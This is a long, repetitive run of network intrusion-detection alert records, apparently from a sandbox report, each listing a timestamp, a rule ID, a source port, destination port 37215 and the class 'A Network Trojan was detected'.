          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539743
          SID:2829579
          Source Port:58846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598024
          SID:2829579
          Source Port:42046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031430
          SID:2829579
          Source Port:51802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718183
          SID:2829579
          Source Port:46736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928572
          SID:2835222
          Source Port:59042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.277197
          SID:2835222
          Source Port:49818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920149
          SID:2835222
          Source Port:48816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397658
          SID:2829579
          Source Port:51560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821961
          SID:2835222
          Source Port:45782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718699
          SID:2829579
          Source Port:51024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.983793
          SID:2835222
          Source Port:59930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286076
          SID:2835222
          Source Port:60768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.915102
          SID:2829579
          Source Port:59198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248192
          SID:2829579
          Source Port:56302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157132
          SID:2829579
          Source Port:34986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242382
          SID:2829579
          Source Port:53982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104402
          SID:2835222
          Source Port:45840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296214
          SID:2829579
          Source Port:46456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288207
          SID:2829579
          Source Port:50170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571798
          SID:2835222
          Source Port:41136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120879
          SID:2835222
          Source Port:32796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206516
          SID:2835222
          Source Port:35902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.632623
          SID:2829579
          Source Port:37556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721509
          SID:2829579
          Source Port:51250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272097
          SID:2835222
          Source Port:34852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034419
          SID:2835222
          Source Port:58778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947503
          SID:2835222
          Source Port:51942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032896
          SID:2835222
          Source Port:43078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.641388
          SID:2829579
          Source Port:58148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563191
          SID:2829579
          Source Port:34738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567960
          SID:2835222
          Source Port:43690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538410
          SID:2829579
          Source Port:43266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719371
          SID:2835222
          Source Port:58862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073597
          SID:2835222
          Source Port:41386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288146
          SID:2835222
          Source Port:55804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169284
          SID:2829579
          Source Port:54424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.954397
          SID:2829579
          Source Port:57168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596909
          SID:2829579
          Source Port:58562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821414
          SID:2829579
          Source Port:55046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283841
          SID:2835222
          Source Port:48944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223432
          SID:2829579
          Source Port:49694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398775
          SID:2829579
          Source Port:51774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.983669
          SID:2829579
          Source Port:45586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165405
          SID:2829579
          Source Port:32976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867091
          SID:2829579
          Source Port:48718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245880
          SID:2829579
          Source Port:46146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989569
          SID:2835222
          Source Port:39704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931504
          SID:2835222
          Source Port:34610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993490
          SID:2835222
          Source Port:60184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294246
          SID:2835222
          Source Port:46530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821786
          SID:2829579
          Source Port:49076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395842
          SID:2835222
          Source Port:39744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645177
          SID:2829579
          Source Port:60510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868901
          SID:2829579
          Source Port:43682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539953
          SID:2829579
          Source Port:52368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.720030
          SID:2829579
          Source Port:45820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.161951
          SID:2835222
          Source Port:50680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080802
          SID:2835222
          Source Port:43458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928723
          SID:2835222
          Source Port:46650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167667
          SID:2829579
          Source Port:36358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948695
          SID:2829579
          Source Port:43500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667673
          SID:2829579
          Source Port:40688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296928
          SID:2829579
          Source Port:38398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822871
          SID:2829579
          Source Port:53552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944660
          SID:2835222
          Source Port:37370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950175
          SID:2829579
          Source Port:35560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948327
          SID:2829579
          Source Port:40886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645412
          SID:2835222
          Source Port:44778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820722
          SID:2835222
          Source Port:42358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205768
          SID:2835222
          Source Port:34576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601766
          SID:2829579
          Source Port:47966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928271
          SID:2829579
          Source Port:47276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558080
          SID:2835222
          Source Port:49892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033358
          SID:2835222
          Source Port:40440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.720014
          SID:2835222
          Source Port:40310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033360
          SID:2829579
          Source Port:32804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905261
          SID:2835222
          Source Port:59164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161346
          SID:2829579
          Source Port:44224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469495
          SID:2835222
          Source Port:40004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028023
          SID:2829579
          Source Port:53336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205979
          SID:2829579
          Source Port:59128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075774
          SID:2835222
          Source Port:47548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.632530
          SID:2835222
          Source Port:47006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604541
          SID:2829579
          Source Port:54618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283735
          SID:2829579
          Source Port:35078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225528
          SID:2829579
          Source Port:60030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595912
          SID:2829579
          Source Port:45372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246570
          SID:2835222
          Source Port:54100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166729
          SID:2829579
          Source Port:41766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595147
          SID:2829579
          Source Port:57112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595840
          SID:2829579
          Source Port:55322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306361
          SID:2835222
          Source Port:52666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031920
          SID:2835222
          Source Port:38192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077592
          SID:2835222
          Source Port:58280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076434
          SID:2835222
          Source Port:45956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563178
          SID:2835222
          Source Port:40588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412755
          SID:2835222
          Source Port:52474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.593991
          SID:2835222
          Source Port:55274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413012
          SID:2829579
          Source Port:56942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028874
          SID:2835222
          Source Port:57774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719825
          SID:2835222
          Source Port:50192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568109
          SID:2835222
          Source Port:35330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163921
          SID:2835222
          Source Port:54588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032979
          SID:2829579
          Source Port:58454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865083
          SID:2829579
          Source Port:34458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242362
          SID:2835222
          Source Port:55660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034336
          SID:2829579
          Source Port:50884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223219
          SID:2829579
          Source Port:50612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600536
          SID:2835222
          Source Port:34948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950882
          SID:2835222
          Source Port:51764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415746
          SID:2835222
          Source Port:40810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929646
          SID:2829579
          Source Port:59908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865890
          SID:2835222
          Source Port:49994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161325
          SID:2835222
          Source Port:52492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413682
          SID:2829579
          Source Port:44526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539357
          SID:2829579
          Source Port:54958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160229
          SID:2829579
          Source Port:36010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165759
          SID:2835222
          Source Port:54044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398543
          SID:2835222
          Source Port:58040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102904
          SID:2835222
          Source Port:39356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597020
          SID:2829579
          Source Port:49268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921773
          SID:2829579
          Source Port:55482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.399089
          SID:2829579
          Source Port:57622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010787
          SID:2829579
          Source Port:39028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412235
          SID:2829579
          Source Port:52356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206128
          SID:2835222
          Source Port:56320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537765
          SID:2835222
          Source Port:41536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603827
          SID:2835222
          Source Port:41412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818675
          SID:2835222
          Source Port:52118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537744
          SID:2829579
          Source Port:33472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035998
          SID:2829579
          Source Port:39578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716305
          SID:2835222
          Source Port:43670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102306
          SID:2829579
          Source Port:43674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862000
          SID:2829579
          Source Port:36460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930111
          SID:2829579
          Source Port:49382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719344
          SID:2835222
          Source Port:56584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225899
          SID:2835222
          Source Port:50424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081558
          SID:2835222
          Source Port:44444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252951
          SID:2829579
          Source Port:45444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286033
          SID:2829579
          Source Port:57472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644528
          SID:2829579
          Source Port:36490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032855
          SID:2829579
          Source Port:50352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.985432
          SID:2829579
          Source Port:54426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950291
          SID:2835222
          Source Port:50508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.740894
          SID:2829579
          Source Port:57222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948900
          SID:2829579
          Source Port:44112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282395
          SID:2829579
          Source Port:47990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993340
          SID:2835222
          Source Port:49246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931273
          SID:2835222
          Source Port:33018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397360
          SID:2829579
          Source Port:39072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398222
          SID:2829579
          Source Port:42772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.594965
          SID:2829579
          Source Port:44732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077171
          SID:2829579
          Source Port:53252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038826
          SID:2829579
          Source Port:49042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719882
          SID:2829579
          Source Port:54900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224487
          SID:2835222
          Source Port:39074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160146
          SID:2835222
          Source Port:49838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914117
          SID:2835222
          Source Port:45908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869780
          SID:2835222
          Source Port:51082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400319
          SID:2829579
          Source Port:43178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947585
          SID:2835222
          Source Port:53170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159262
          SID:2829579
          Source Port:43064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538686
          SID:2829579
          Source Port:56428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.594126
          SID:2829579
          Source Port:48794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597298
          SID:2835222
          Source Port:54218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037476
          SID:2835222
          Source Port:52034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.897925
          SID:2829579
          Source Port:39540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564135
          SID:2829579
          Source Port:35694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991439
          SID:2829579
          Source Port:50496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289466
          SID:2829579
          Source Port:48272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302412
          SID:2835222
          Source Port:44718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923737
          SID:2835222
          Source Port:40330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867176
          SID:2835222
          Source Port:38510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207860
          SID:2829579
          Source Port:42106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.018176
          SID:2835222
          Source Port:54194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302127
          SID:2835222
          Source Port:53576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948178
          SID:2829579
          Source Port:45620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928785
          SID:2829579
          Source Port:60828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129076
          SID:2829579
          Source Port:56876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286604
          SID:2829579
          Source Port:42088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034194
          SID:2829579
          Source Port:41732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028722
          SID:2829579
          Source Port:37826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644816
          SID:2835222
          Source Port:60918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568405
          SID:2835222
          Source Port:57214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465451
          SID:2829579
          Source Port:50228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.420103
          SID:2835222
          Source Port:42792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713174
          SID:2829579
          Source Port:41416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562217
          SID:2829579
          Source Port:55746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.276662
          SID:2829579
          Source Port:53670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718297
          SID:2829579
          Source Port:47612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292420
          SID:2829579
          Source Port:47432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987268
          SID:2835222
          Source Port:55156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037914
          SID:2829579
          Source Port:56256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287328
          SID:2829579
          Source Port:58978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027881
          SID:2835222
          Source Port:34220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.696319
          SID:2835222
          Source Port:37186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.684687
          SID:2835222
          Source Port:34734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
